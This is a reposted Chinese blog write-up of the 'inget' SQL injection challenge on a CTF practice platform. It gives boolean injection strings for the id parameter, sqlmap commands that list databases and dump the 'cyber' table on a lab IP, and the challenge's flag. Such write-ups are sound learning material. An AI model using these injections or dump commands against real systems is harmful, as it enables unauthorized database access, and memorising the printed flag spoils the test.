devbox
AllinToyou
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

攻防世界WEB练习-inget_please enter id,and try to bypass

作者:AllinToyou | 2024-03-31 11:50:54

please enter id,and try to bypass

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

题目场景

尝试SQL注入

尝试sqlmap注入

找到flag

题目场景

尝试SQL注入

?id=1' and 1=1-- -

?id=1' and 1=2-- -

?id=1' or 1=2-- -

都均无回显

?id=1' or 1=1-- -

回显出flag

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{76d13a6f794e1946a69a955eeb3d688d}

尝试sqlmap注入

sqlmap下载地址:http://sqlmap.org

python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1"  -dbs

查看cyber表中数据

python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1"  -T cyber --dump

找到flag

cyberpeace{76d13a6f794e1946a69a955eeb3d688d}

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/344537
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号